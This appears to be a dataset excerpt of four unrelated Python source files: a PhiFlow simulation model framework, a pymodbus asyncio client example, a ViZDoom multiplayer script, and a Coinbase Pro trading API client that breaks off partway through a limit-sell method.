source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
model.py
|
# coding=utf-8
from __future__ import print_function
import logging, os, numbers, six, numpy, threading, inspect, time
from os.path import isfile
import phi.fluidformat, phi.math.nd
from phi.viz.plot import PlotlyFigureBuilder
def synchronized_method(method):
outer_lock = threading.Lock()
lock_name = "__" + method.__name__ + "_lock" + "__"
def sync_method(self, *args, **kws):
with outer_lock:
if not hasattr(self, lock_name): setattr(self, lock_name, threading.Lock())
lock = getattr(self, lock_name)
with lock:
return method(self, *args, **kws)
return sync_method
class TimeDependentField(object):
def __init__(self, name, generator):
self.name = name
self.generator = generator
self.array = None
self.invalidation_version = -1
@synchronized_method
def get(self, invalidation_version):
if invalidation_version != self.invalidation_version:
self.array = self.generator()
self.invalidation_version = invalidation_version
return self.array
class FieldSequenceModel(object):
def __init__(self,
name="Φ-*flow* Application",
subtitle="Interactive demo based on PhiFlow",
fields=None,
stride=1,
record_images=False, record_data=False,
base_dir=os.path.expanduser(os.path.join("~", "model")),
recorded_fields=None,
summary=None,
custom_properties=None,
target_scene=None,
objects_to_save=None):
self.name = name
self.subtitle = subtitle
self.summary = summary if summary else name
if fields:
self.fields = {name: TimeDependentField(name, generator) for (name,generator) in fields.items()}
else:
self.fields = {}
self.message = None
self.time = 0
self._invalidation_counter = 0
self.print_to_console = True
self._controls = []
self._actions = []
self._traits = []
self.prepared = False
self.current_action = None
self._pause = False
# Setup directory & Logging
self.objects_to_save = [ self.__class__ ] if objects_to_save is None else list(objects_to_save)
self.base_dir = os.path.expanduser(base_dir)
if not target_scene:
self.new_scene()
self.uses_existing_scene = False
else:
self.scene = target_scene
self.uses_existing_scene = True
if not isfile(self.scene.subpath("info.log")):
logfile = self.scene.subpath("info.log")
else:
index = 2
while True:
logfile = self.scene.subpath("info_%d.log"%index)
if not isfile(logfile): break
else: index += 1
logging.basicConfig(filename=logfile, level=logging.INFO, format="%(message)s (%(levelname)s), %(asctime)sn\n")
print("Scene directory is %s" % self.scene.path)
# Recording
self.record_images = record_images
self.record_data = record_data
self.recorded_fields = recorded_fields if recorded_fields is not None else []
self.rec_all_slices = False
self.sequence_stride = stride
self._custom_properties = custom_properties if custom_properties else {}
self.figures = PlotlyFigureBuilder()
self._simulation = None
self.info("Setting up model...")
def new_scene(self):
self.scene = phi.fluidformat.new_scene(self.base_dir, self.scene_summary(), mkdir=True)
@property
def sim(self):
return self._simulation
@sim.setter
def sim(self, sim):
self._simulation = sim
def set_simulation(self, sim):
self.sim = sim
@property
def directory(self):
return self.scene.path
@property
def image_dir(self):
return self.scene.subpath("images")
def get_image_dir(self):
return self.scene.subpath("images", create=True)
def progress(self):
self.time += 1
self.step()
self.invalidate()
def invalidate(self):
self._invalidation_counter += 1
def step(self):
self.info("Implement step(self) to have something happen")
@property
def fieldnames(self):
return sorted(self.fields.keys())
def get_field(self, fieldname):
if not fieldname in self.fields:
raise KeyError("Field %s not declared. Available fields are %s" % (fieldname, self.fields.keys()))
return self.fields[fieldname].get(self._invalidation_counter)
def add_field(self, name, generator):
assert not self.prepared, "Cannot add fields to a prepared model"
self.fields[name] = TimeDependentField(name, generator)
@property
def actions(self):
return self._actions
def add_action(self, name, methodcall):
self._actions.append(Action(name, methodcall, name))
def run_action(self, action):
message_before = self.message
action.method()
self.invalidate()
message_after = self.message
if message_before == message_after:
if self.message is None or self.message == "":
self.message = display_name(action.name)
else:
self.message += " | " + display_name(action.name)
@property
def traits(self):
return self._traits
def add_trait(self, trait):
assert not self.prepared, "Cannot add traits to a prepared model"
self._traits.append(trait)
@property
def controls(self):
return self._controls
def prepare(self):
if self.prepared:
return
logging.info("Gathering model data...")
self.prepared = True
# Controls
for name in dir(self):
val = getattr(self, name)
editable_value = None
if isinstance(val, EditableValue):
editable_value = val
setattr(self, name, val.initial_value) # Replace EditableValue with initial value
elif name.startswith("value_"):
value_name = display_name(name[6:])
dtype = type(val)
if dtype == bool:
editable_value = EditableBool(value_name, val)
elif isinstance(val, numbers.Integral): # Int
editable_value = EditableInt(value_name, val)
elif isinstance(val, numbers.Number): # Float
editable_value = EditableFloat(value_name, val)
elif isinstance(val, six.string_types):
editable_value = EditableString(value_name, val)
if editable_value:
self._controls.append(Control(self, name, editable_value))
# Actions
for method_name in dir(self):
if method_name.startswith("action_") and callable(getattr(self, method_name)):
self._actions.append(Action(display_name(method_name[7:]), getattr(self, method_name), method_name))
# Scene
self._update_scene_properties()
source_files_to_save = set()
for object in self.objects_to_save:
source_files_to_save.add(inspect.getabsfile(object))
for source_file in source_files_to_save:
self.scene.copy_src(source_file)
def add_custom_property(self, key, value):
self._custom_properties[key] = value
if self.prepared: self._update_scene_properties()
def add_custom_properties(self, dict):
self._custom_properties.update(dict)
if self.prepared: self._update_scene_properties()
def _update_scene_properties(self):
if self.uses_existing_scene: return
app_name = inspect.getfile(self.__class__)
app_path = inspect.getabsfile(self.__class__)
properties = {
"instigator": "FieldSequenceModel",
"traits": self.traits,
"app": str(app_name),
"app_path": str(app_path),
"name": self.name,
"description": self.subtitle,
"all_fields": self.fieldnames,
"actions": [action.name for action in self.actions],
"controls": [{control.name: control.value} for control in self.controls],
"summary": self.scene_summary(),
"time_of_writing": self.time,
}
if self._simulation:
properties.update(self._simulation.as_dict())
properties.update(self.custom_properties())
self.scene.properties = properties
def settings_str(self):
return "".join([
" " + str(control) for control in self.controls
])
def custom_properties(self):
return self._custom_properties
def info(self, message):
if isinstance(message, int):
self.time = message
else:
self.message = message
if self.print_to_console:
print(str(self.time)+": "+message)
logging.info(message)
def debug(self, message):
logging.info(message)
def scene_summary(self):
return self.summary
def list_controls(self, names):
return
def show(self, *args, **kwargs):
from phi.viz.dash_gui import DashFieldSequenceGui
gui = DashFieldSequenceGui(self, *args, **kwargs)
return gui.show()
@property
def status(self):
pausing = "/Pausing" if self._pause and self.current_action else ""
action = self.current_action if self.current_action else "Idle"
message = (" - %s"%self.message) if self.message else ""
return "{}{} ({}){}".format(action, pausing, self.time, message)
def run_step(self, framerate=None, allow_recording=True):
try:
self.current_action = "Running"
starttime = time.time()
self.progress()
if allow_recording and self.time % self.sequence_stride == 0:
self.record_frame()
if framerate is not None:
duration = time.time() - starttime
rest = 1.0/framerate/self.sequence_stride - duration
if rest > 0:
self.current_action = "Waiting"
time.sleep(rest)
finally:
self.current_action = None
def play(self, max_steps=None, callback=None, framerate=None, allow_recording=True):
def target():
self._pause = False
step_count = 0
while not self._pause:
self.run_step(framerate=framerate, allow_recording=allow_recording)
step_count += 1
if max_steps and step_count >= max_steps:
break
if callback is not None:
callback()
thread = threading.Thread(target=target)
thread.start()
return self
def pause(self):
self._pause = True
@property
def running(self):
return self.current_action is not None
def record_frame(self):
self.current_action = "Recording"
files = []
if self.record_images:
os.path.isdir(self.image_dir) or os.makedirs(self.image_dir)
arrays = [self.get_field(field) for field in self.recorded_fields]
for name, array in zip(self.recorded_fields, arrays):
files += self.figures.save_figures(self.image_dir, name, self.time, array)
if self.record_data:
arrays = [self.get_field(field) for field in self.recorded_fields]
arrays = [a.staggered if isinstance(a, phi.math.nd.StaggeredGrid) else a for a in arrays]
files += phi.fluidformat.write_sim_frame(self.directory, arrays, self.recorded_fields, self.time)
if files:
self.message = "Frame written to %s" % files
self.current_action = None
def benchmark(self, sequence_count):
self._pause = False
step_count = 0
starttime = time.time()
for i in range(sequence_count):
self.run_step(framerate=None, allow_recording=False)
step_count += 1
if self._pause: break
time_elapsed = time.time() - starttime
return step_count, time_elapsed
def config_recording(self, images, data, fields):
self.record_images = images
self.record_data = data
self.recorded_fields = fields
class EditableValue(object):
def __init__(self, name, type, initial_value, category, minmax, is_linear):
self.name = name
self.type = type
self.initial_value = initial_value
self.category = category
self.minmax = minmax
self.is_linear = is_linear
@property
def min_value(self):
return self.minmax[0]
@property
def max_value(self):
return self.minmax[1]
class EditableFloat(EditableValue):
def __init__(self, name, initial_value, minmax=None, category=None, log_scale=None):
if minmax is not None:
assert len(minmax) == 2, "minmax must be pair (min, max)"
if log_scale is None:
if minmax is None:
log_scale = True
else:
log_scale = minmax[1] / float(minmax[0]) > 10
if not minmax:
if log_scale:
magn = numpy.log10(initial_value)
minmax = (10.0**(magn-3.2), 10.0**(magn+2.2))
else:
if initial_value == 0.0:
minmax = (-10.0, 10.0)
elif initial_value > 0:
minmax = (0., 4. * initial_value)
else:
minmax = (2. * initial_value, -2. * initial_value)
else:
minmax = (float(minmax[0]), float(minmax[1]))
EditableValue.__init__(self, name, "float", initial_value, category, minmax, not log_scale)
@property
def use_log_scale(self):
return not self.is_linear
class EditableInt(EditableValue):
def __init__(self, name, initial_value, minmax=None, category=None):
if not minmax:
if initial_value == 0:
minmax = (-10, 10)
elif initial_value > 0:
minmax = (0, 4*initial_value)
else:
minmax = (2 * initial_value, -2 * initial_value)
EditableValue.__init__(self, name, "int", initial_value, category, minmax, True)
class EditableBool(EditableValue):
def __init__(self, name, initial_value, category=None):
EditableValue.__init__(self, name, "bool", initial_value, category, (False, True), True)
class EditableString(EditableValue):
def __init__(self, name, initial_value, category=None, rows=20):
EditableValue.__init__(self, name, "text", initial_value, category, ("", "A"*rows), True)
@property
def rows(self):
return len(self.max_value)
class Control(object):
def __init__(self, model, attribute_name, editable_value):
self.model = model
self.attribute_name = attribute_name
self.editable_value = editable_value
@property
def value(self):
val = getattr(self.model, self.attribute_name)
if isinstance(val, numpy.float32):
return float(val)
if isinstance(val, numpy.float64):
return float(val)
return val
@value.setter
def value(self, value):
setattr(self.model, self.attribute_name, value)
self.model.invalidate()
@property
def name(self):
return self.editable_value.name
@property
def type(self):
return self.editable_value.type
@property
def id(self):
return self.attribute_name
def __str__(self):
return self.name + "_" + str(self.value)
@property
def range(self):
return self.editable_value.minmax
class Action(object):
def __init__(self, name, method, id):
self.name = name
self.method = method
self.method_name = id
@property
def id(self):
return self.method_name
def display_name(python_name):
n = list(python_name)
n[0] = n[0].upper()
for i in range(1,len(n)):
if n[i] == "_":
n[i] = " "
if len(n) > i+1:
n[i+1] = n[i+1].upper()
return "".join(n)
|
async_asyncio_client.py
|
#!/usr/bin/env python3
"""
Pymodbus Asynchronous Client Examples
--------------------------------------------------------------------------
The following is an example of how to use the asynchronous modbus
client implementation from pymodbus with asyncio.
The example is only valid on Python3.4 and above
"""
import asyncio
import logging
# ----------------------------------------------------------------------- #
# Import the required asynchronous client
# ----------------------------------------------------------------------- #
from pymodbus.client.asynchronous.tcp import AsyncModbusTCPClient as ModbusClient
# from pymodbus.client.asynchronous.udp import (
# AsyncModbusUDPClient as ModbusClient)
from pymodbus.client.asynchronous import schedulers
from threading import Thread
import time
# --------------------------------------------------------------------------- #
# configure the client logging
# --------------------------------------------------------------------------- #
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# specify slave to query
# --------------------------------------------------------------------------- #
# The slave to query is specified in an optional parameter for each
# individual request. This can be done by specifying the `unit` parameter
# which defaults to `0x00`
# --------------------------------------------------------------------------- #
UNIT = 0x01
async def start_async_test(client):
# ----------------------------------------------------------------------- #
# specify slave to query
# ----------------------------------------------------------------------- #
# The slave to query is specified in an optional parameter for each
# individual request. This can be done by specifying the `unit` parameter
# which defaults to `0x00`
# ----------------------------------------------------------------------- #
log.debug("Reading Coils")
rr = await client.read_coils(1, 1, unit=0x01)
# ----------------------------------------------------------------------- #
# example requests
# ----------------------------------------------------------------------- #
# simply call the methods that you would like to use. An example session
# is displayed below along with some assert checks. Note that some modbus
# implementations differentiate holding/input discrete/coils and as such
# you will not be able to write to these, therefore the starting values
# are not known to these tests. Furthermore, some use the same memory
# blocks for the two sets, so a change to one is a change to the other.
# Keep both of these cases in mind when testing as the following will
# _only_ pass with the supplied asynchronous modbus server (script supplied).
# ----------------------------------------------------------------------- #
log.debug("Write to a Coil and read back")
rq = await client.write_coil(0, True, unit=UNIT)
rr = await client.read_coils(0, 1, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rr.bits[0] == True) # test the expected value
log.debug("Write to multiple coils and read back- test 1")
rq = await client.write_coils(1, [True]*8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
rr = await client.read_coils(1, 21, unit=UNIT)
assert(rr.function_code < 0x80) # test that we are not an error
resp = [True]*21
# If the returned output quantity is not a multiple of eight,
# the remaining bits in the final data byte will be padded with zeros
# (toward the high order end of the byte).
resp.extend([False]*3)
assert(rr.bits == resp) # test the expected value
log.debug("Write to multiple coils and read back - test 2")
rq = await client.write_coils(1, [False]*8, unit=UNIT)
rr = await client.read_coils(1, 8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rr.bits == [False]*8) # test the expected value
log.debug("Read discrete inputs")
rr = await client.read_discrete_inputs(0, 8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
log.debug("Write to a holding register and read back")
rq = await client.write_register(1, 10, unit=UNIT)
rr = await client.read_holding_registers(1, 1, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rr.registers[0] == 10) # test the expected value
log.debug("Write to multiple holding registers and read back")
rq = await client.write_registers(1, [10]*8, unit=UNIT)
rr = await client.read_holding_registers(1, 8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rr.registers == [10]*8) # test the expected value
log.debug("Read input registers")
rr = await client.read_input_registers(1, 8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
arguments = {
'read_address': 1,
'read_count': 8,
'write_address': 1,
'write_registers': [20]*8,
}
log.debug("Read write registeres simulataneously")
rq = await client.readwrite_registers(unit=UNIT, **arguments)
rr = await client.read_holding_registers(1, 8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rq.registers == [20]*8) # test the expected value
assert(rr.registers == [20]*8) # test the expected value
await asyncio.sleep(1)
def run_with_not_running_loop():
"""
A loop is created and is passed to ModbusClient factory to be used.
:return:
"""
log.debug("Running Async client with asyncio loop not yet started")
log.debug("------------------------------------------------------")
loop = asyncio.new_event_loop()
assert not loop.is_running()
asyncio.set_event_loop(loop)
new_loop, client = ModbusClient(schedulers.ASYNC_IO, port=5020, loop=loop)
loop.run_until_complete(start_async_test(client.protocol))
loop.close()
log.debug("--------------RUN_WITH_NOT_RUNNING_LOOP---------------")
log.debug("")
def run_with_already_running_loop():
"""
An already running loop is passed to ModbusClient Factory
:return:
"""
log.debug("Running Async client with asyncio loop already started")
log.debug("------------------------------------------------------")
def done(future):
log.info("Done !!!")
def start_loop(loop):
"""
Start Loop
:param loop:
:return:
"""
asyncio.set_event_loop(loop)
loop.run_forever()
loop = asyncio.new_event_loop()
t = Thread(target=start_loop, args=[loop])
t.daemon = True
# Start the loop
t.start()
assert loop.is_running()
asyncio.set_event_loop(loop)
loop, client = ModbusClient(schedulers.ASYNC_IO, port=5020, loop=loop)
future = asyncio.run_coroutine_threadsafe(
start_async_test(client.protocol), loop=loop)
future.add_done_callback(done)
while not future.done():
time.sleep(0.1)
loop.stop()
log.debug("--------DONE RUN_WITH_ALREADY_RUNNING_LOOP-------------")
log.debug("")
def run_with_no_loop():
"""
ModbusClient Factory creates a loop.
:return:
"""
log.debug("---------------------RUN_WITH_NO_LOOP-----------------")
loop, client = ModbusClient(schedulers.ASYNC_IO, port=5020)
loop.run_until_complete(start_async_test(client.protocol))
loop.close()
log.debug("--------DONE RUN_WITH_NO_LOOP-------------")
log.debug("")
if __name__ == '__main__':
# Run with No loop
log.debug("Running Async client")
log.debug("------------------------------------------------------")
run_with_no_loop()
# Run with loop not yet started
# run_with_not_running_loop()
# Run with already running loop
# run_with_already_running_loop()
log.debug("")
|
multiple_instances_advance.py
|
#!/usr/bin/env python
from __future__ import print_function
from random import choice, random
from time import sleep
from vizdoom import *
# For multiplayer game use process (ZDoom's multiplayer sync mechanism prevents threads to work as expected).
from multiprocessing import Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Config
episodes = 10
timelimit = 1 # min
players = 2 # number of players
skip = 1
mode = Mode.PLAYER
random_sleep = False
window = False
args =""
console = False
args = "+viz_debug 1 +viz_debug_instances 1"
console = True
#config = "../config/multi_duel.cfg"
config = "../config/cig.cfg"
def player_host(p):
game = DoomGame()
game.load_config(config)
game.add_game_args("-host " + str(p) + " -deathmatch +timelimit " + str(timelimit) + " +sv_spawnfarthest 1")
game.add_game_args("+name Player0 +colorset 0")
game.set_mode(mode)
game.add_game_args(args)
game.set_console_enabled(console)
game.set_window_visible(window)
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
action_count = 0
for i in range(episodes):
print("Episode #" + str(i + 1))
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
state = game.get_state()
game.make_action(choice(actions), skip)
action_count += 1
if random_sleep:
sleep(random()/10)
print("Player0:", state.number, action_count, game.get_episode_time())
print("Player0 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
print("Episode finished!")
for i in range(p):
if i == 0:
print("Host: Player" + str(i) + " frags:", game.get_game_variable(GameVariable.PLAYER1_FRAGCOUNT))
if i == 1:
print("Host: Player" + str(i) + " frags:", game.get_game_variable(GameVariable.PLAYER2_FRAGCOUNT))
if i == 2:
print("Host: Player" + str(i) + " frags:", game.get_game_variable(GameVariable.PLAYER3_FRAGCOUNT))
if i == 3:
print("Host: Player" + str(i) + " frags:", game.get_game_variable(GameVariable.PLAYER4_FRAGCOUNT))
if i == 4:
print("Host: Player" + str(i) + " frags:", game.get_game_variable(GameVariable.PLAYER5_FRAGCOUNT))
if i == 5:
print("Host: Player" + str(i) + " frags:", game.get_game_variable(GameVariable.PLAYER6_FRAGCOUNT))
if i == 6:
print("Host: Player" + str(i) + " frags:", game.get_game_variable(GameVariable.PLAYER7_FRAGCOUNT))
if i == 7:
print("Host: Player" + str(i) + " frags:", game.get_game_variable(GameVariable.PLAYER8_FRAGCOUNT))
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player_join(p):
game = DoomGame()
game.load_config(config)
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player" + str(p) + " +colorset " + str(p))
game.set_mode(mode)
game.add_game_args(args)
game.set_console_enabled(console)
game.set_window_visible(window)
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
action_count = 0
sleep_time = 0.01 * p
for i in range(episodes):
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
state = game.get_state()
game.make_action(choice(actions), skip)
action_count += 1
print("Player" + str(p) + ":", state.number, action_count, game.get_episode_time())
if random_sleep:
sleep(random()/10)
elif sleep_time > 0:
sleep(sleep_time)
print("Player" + str(p) + " frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
if __name__ == '__main__':
processes = []
# p_host = Process(target=player_host, args=(players,))
# p_host.start()
# processes.append(p_host)
for i in range(players - 1):
p_join = Process(target=player_join, args=(i + 1,))
p_join.start()
processes.append(p_join)
player_host(players)
print("Done")
|
api.py
|
"""Remotely control your Coinbase Pro account via their API"""
import re
import json
import hmac
import hashlib
import time
import requests
import base64
import sys
import pandas as pd
from numpy import floor
from datetime import datetime, timedelta
from requests.auth import AuthBase
from requests import Request
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
from models.helper.LogHelper import Logger
from models.exchange.Granularity import Granularity
MARGIN_ADJUSTMENT = 0.0025
DEFAULT_MAKER_FEE_RATE = 0.005
DEFAULT_TAKER_FEE_RATE = 0.005
MINIMUM_TRADE_AMOUNT = 10
DEFAULT_GRANULARITY = 3600
SUPPORTED_GRANULARITY = [60, 300, 900, 3600, 21600, 86400]
FREQUENCY_EQUIVALENTS = ["T", "5T", "15T", "H", "6H", "D"]
MAX_GRANULARITY = max(SUPPORTED_GRANULARITY)
DEFAULT_MARKET = "BTC-GBP"
class AuthAPIBase:
def _isMarketValid(self, market: str) -> bool:
p = re.compile(r"^[1-9A-Z]{2,5}\-[1-9A-Z]{2,5}$")
if p.match(market):
return True
return False
# def to_coinbasepro_granularity(self, granularity) -> str:
# if isinstance(granularity, int):
# if granularity in SUPPORTED_GRANULARITY:
# return granularity
# else:
# raise ValueError(f"Invalid Binance granularity: {granularity}")
# else:
# return {"1min" : 60, "5min" : 300, "15min" : 900, "1hour" : 3600, "6hour" : 21600, "1day" : 86400} [
# granularity
# ]
class AuthAPI(AuthAPIBase):
def __init__(
self,
api_key="",
api_secret="",
api_passphrase="",
api_url="https://api.pro.coinbase.com",
) -> None:
"""Coinbase Pro API object model
Parameters
----------
api_key : str
Your Coinbase Pro account portfolio API key
api_secret : str
Your Coinbase Pro account portfolio API secret
api_passphrase : str
Your Coinbase Pro account portfolio API passphrase
api_url
Coinbase Pro API URL
"""
# options
self.debug = False
self.die_on_api_error = False
valid_urls = [
"https://api.pro.coinbase.com",
"https://api.pro.coinbase.com/",
"https://public.sandbox.pro.coinbase.com",
"https://public.sandbox.pro.coinbase.com/",
]
# validate Coinbase Pro API
if api_url not in valid_urls:
raise ValueError("Coinbase Pro API URL is invalid")
if api_url[-1] != "/":
api_url = api_url + "/"
# validates the api key is syntactically correct
p = re.compile(r"^[a-f0-9]{32}$")
if not p.match(api_key):
self.handle_init_error("Coinbase Pro API key is invalid")
# validates the api secret is syntactically correct
p = re.compile(r"^[A-z0-9+\/]+==$")
if not p.match(api_secret):
self.handle_init_error("Coinbase Pro API secret is invalid")
# validates the api passphrase is syntactically correct
p = re.compile(r"^[A-z0-9#$%=@!{},`~&*()<>?.:;_|^/+\[\]]{8,32}$")
if not p.match(api_passphrase):
self.handle_init_error("Coinbase Pro API passphrase is invalid")
self._api_key = api_key
self._api_secret = api_secret
self._api_passphrase = api_passphrase
self._api_url = api_url
def handle_init_error(self, err: str) -> None:
"""Handle initialisation error"""
if self.debug:
raise TypeError(err)
else:
raise SystemExit(err)
def __call__(self, request) -> Request:
"""Signs the request"""
timestamp = str(time.time())
body = (request.body or b"").decode()
message = f"{timestamp}{request.method}{request.path_url}{body}"
hmac_key = base64.b64decode(self._api_secret)
signature = hmac.new(hmac_key, message.encode(), hashlib.sha256)
signature_b64 = base64.b64encode(signature.digest()).decode()
request.headers.update(
{
"CB-ACCESS-SIGN": signature_b64,
"CB-ACCESS-TIMESTAMP": timestamp,
"CB-ACCESS-KEY": self._api_key,
"CB-ACCESS-PASSPHRASE": self._api_passphrase,
"Content-Type": "application/json",
}
)
return request
def getAccounts(self) -> pd.DataFrame:
"""Retrieves your list of accounts"""
# GET /api/v3/account
try:
df = self.authAPI("GET", "accounts")
except:
return pd.DataFrame()
if len(df) == 0:
return pd.DataFrame()
# exclude accounts with a nil balance
df = df[df.balance != "0.0000000000000000"]
# reset the dataframe index to start from 0
df = df.reset_index()
return df
def getAccount(self, account: str) -> pd.DataFrame:
"""Retrieves a specific account"""
# validates the account is syntactically correct
p = re.compile(r"^[a-f0-9\-]{36,36}$")
if not p.match(account):
self.handle_init_error("Coinbase Pro account is invalid")
try:
return self.authAPI("GET", f"accounts/{account}")
except:
return pd.DataFrame()
def getFees(self, market: str = "") -> pd.DataFrame:
"""Retrieves market fees"""
try:
df = self.authAPI("GET", "fees")
if len(df) == 0:
return pd.DataFrame()
if len(market):
df["market"] = market
else:
df["market"] = ""
return df
except:
return pd.DataFrame()
def getMakerFee(self, market: str = "") -> float:
"""Retrieves maker fee"""
if len(market):
fees = self.getFees(market)
else:
fees = self.getFees()
if len(fees) == 0 or "maker_fee_rate" not in fees:
Logger.error(
f"error: 'maker_fee_rate' not in fees (using {DEFAULT_MAKER_FEE_RATE} as a fallback)"
)
return DEFAULT_MAKER_FEE_RATE
return float(fees["maker_fee_rate"].to_string(index=False).strip())
def getTakerFee(self, market: str = "") -> float:
"""Retrieves taker fee"""
if len(market) != None:
fees = self.getFees(market)
else:
fees = self.getFees()
if len(fees) == 0 or "taker_fee_rate" not in fees:
Logger.error(
f"error: 'taker_fee_rate' not in fees (using {DEFAULT_TAKER_FEE_RATE} as a fallback)"
)
return DEFAULT_TAKER_FEE_RATE
return float(fees["taker_fee_rate"].to_string(index=False).strip())
def getUSDVolume(self) -> float:
"""Retrieves USD volume"""
try:
fees = self.getFees()
if "usd_volume" in fees:
return float(fees["usd_volume"].to_string(index=False).strip())
else:
return 0
except:
return 0
def getOrders(
self, market: str = "", action: str = "", status: str = "all"
) -> pd.DataFrame:
"""Retrieves your list of orders with optional filtering"""
# if market provided
if market != "":
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
# if action provided
if action != "":
# validates action is either a buy or sell
if not action in ["buy", "sell"]:
raise ValueError("Invalid order action.")
# validates status is either open, pending, done, active, or all
if not status in ["open", "pending", "done", "active", "all"]:
raise ValueError("Invalid order status.")
try:
# GET /orders?status
resp = self.authAPI("GET", f"orders?status={status}")
if len(resp) > 0:
if status == "open":
df = resp.copy()[
[
"created_at",
"product_id",
"side",
"type",
"size",
"price",
"status",
]
]
df["value"] = float(df["price"]) * float(df["size"]) - (
float(df["price"]) * MARGIN_ADJUSTMENT
)
else:
if "specified_funds" in resp:
df = resp.copy()[
[
"created_at",
"product_id",
"side",
"type",
"filled_size",
"specified_funds",
"executed_value",
"fill_fees",
"status",
]
]
else:
# manual limit orders do not contain 'specified_funds'
df_tmp = resp.copy()
df_tmp["specified_funds"] = None
df = df_tmp[
[
"created_at",
"product_id",
"side",
"type",
"filled_size",
"specified_funds",
"executed_value",
"fill_fees",
"status",
]
]
else:
return pd.DataFrame()
# replace null NaN values with 0
df.copy().fillna(0, inplace=True)
df_tmp = df.copy()
df_tmp["price"] = 0.0
df_tmp["filled_size"] = df_tmp["filled_size"].astype(float)
df_tmp["specified_funds"] = df_tmp["specified_funds"].astype(float)
df_tmp["executed_value"] = df_tmp["executed_value"].astype(float)
df_tmp["fill_fees"] = df_tmp["fill_fees"].astype(float)
df = df_tmp
# calculates the price at the time of purchase
if status != "open":
df["price"] = df.copy().apply(
lambda row: (float(row.executed_value) * 100)
/ (float(row.filled_size) * 100)
if float(row.filled_size) > 0
else 0,
axis=1,
)
# df.loc[df['filled_size'] > 0, 'price'] = (df['executed_value'] * 100) / (df['filled_size'] * 100)
# rename the columns
if status == "open":
df.columns = [
"created_at",
"market",
"action",
"type",
"size",
"price",
"status",
"value",
]
df = df[
[
"created_at",
"market",
"action",
"type",
"size",
"value",
"status",
"price",
]
]
df["size"] = df["size"].astype(float).round(8)
else:
df.columns = [
"created_at",
"market",
"action",
"type",
"value",
"size",
"filled",
"fees",
"status",
"price",
]
df = df[
[
"created_at",
"market",
"action",
"type",
"size",
"value",
"fees",
"price",
"status",
]
]
df.columns = [
"created_at",
"market",
"action",
"type",
"size",
"filled",
"fees",
"price",
"status",
]
df_tmp = df.copy()
df_tmp["filled"] = df_tmp["filled"].astype(float).round(8)
df_tmp["size"] = df_tmp["size"].astype(float).round(8)
df_tmp["fees"] = df_tmp["fees"].astype(float).round(8)
df_tmp["price"] = df_tmp["price"].astype(float).round(8)
df = df_tmp
# convert dataframe to a time series
tsidx = pd.DatetimeIndex(
pd.to_datetime(df["created_at"]).dt.strftime("%Y-%m-%dT%H:%M:%S.%Z")
)
df.set_index(tsidx, inplace=True)
df = df.drop(columns=["created_at"])
# if marker provided
if market != "":
# filter by market
df = df[df["market"] == market]
# if action provided
if action != "":
# filter by action
df = df[df["action"] == action]
# if status provided
if status != "all":
# filter by status
df = df[df["status"] == status]
# reverse orders and reset index
df = df.iloc[::-1].reset_index()
# for sell orders size is filled
df["size"] = df["size"].fillna(df["filled"])
return df
except:
return pd.DataFrame()
def getTime(self) -> datetime:
"""Retrieves the exchange time"""
try:
resp = self.authAPI("GET", "time")
if "epoch" in resp:
epoch = int(resp["epoch"])
return datetime.fromtimestamp(epoch)
else:
Logger.error(resp)
return None
except Exception as e:
Logger.error(f"Error: {e}")
return None
def marketBuy(self, market: str = "", quote_quantity: float = 0) -> pd.DataFrame:
"""Executes a market buy providing a funding amount"""
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
# validates quote_quantity is either an integer or float
if not isinstance(quote_quantity, int) and not isinstance(
quote_quantity, float
):
Logger.critical(
"Please report this to Michael Whittle: "
+ str(quote_quantity)
+ " "
+ str(type(quote_quantity))
)
raise TypeError("The funding amount is not numeric.")
# funding amount needs to be greater than 10
if quote_quantity < MINIMUM_TRADE_AMOUNT:
Logger.warning(f"Trade amount is too small (>= {MINIMUM_TRADE_AMOUNT}).")
return pd.DataFrame()
# raise ValueError(f"Trade amount is too small (>= {MINIMUM_TRADE_AMOUNT}).")
try:
order = {
"product_id": market,
"type": "market",
"side": "buy",
"funds": self.marketQuoteIncrement(market, quote_quantity),
}
Logger.debug(order)
# connect to authenticated coinbase pro api
model = AuthAPI(
self._api_key, self._api_secret, self._api_passphrase, self._api_url
)
# place order and return result
return model.authAPI("POST", "orders", order)
except:
return pd.DataFrame()
def marketSell(self, market: str = "", base_quantity: float = 0) -> pd.DataFrame:
"""Executes a market sell providing a crypto amount"""
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
if not isinstance(base_quantity, int) and not isinstance(base_quantity, float):
raise TypeError("The crypto amount is not numeric.")
try:
order = {
"product_id": market,
"type": "market",
"side": "sell",
"size": self.marketBaseIncrement(market, base_quantity),
}
Logger.debug(order)
model = AuthAPI(
self._api_key, self._api_secret, self._api_passphrase, self._api_url
)
return model.authAPI("POST", "orders", order)
except:
return pd.DataFrame()
def limitSell(
self, market: str = "", base_quantity: float = 0, future_price: float = 0
) -> pd.DataFrame:
"""Initiates a limit sell order"""
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
if not isinstance(base_quantity, int) and not isinstance(base_quantity, float):
raise TypeError("The crypto amount is not numeric.")
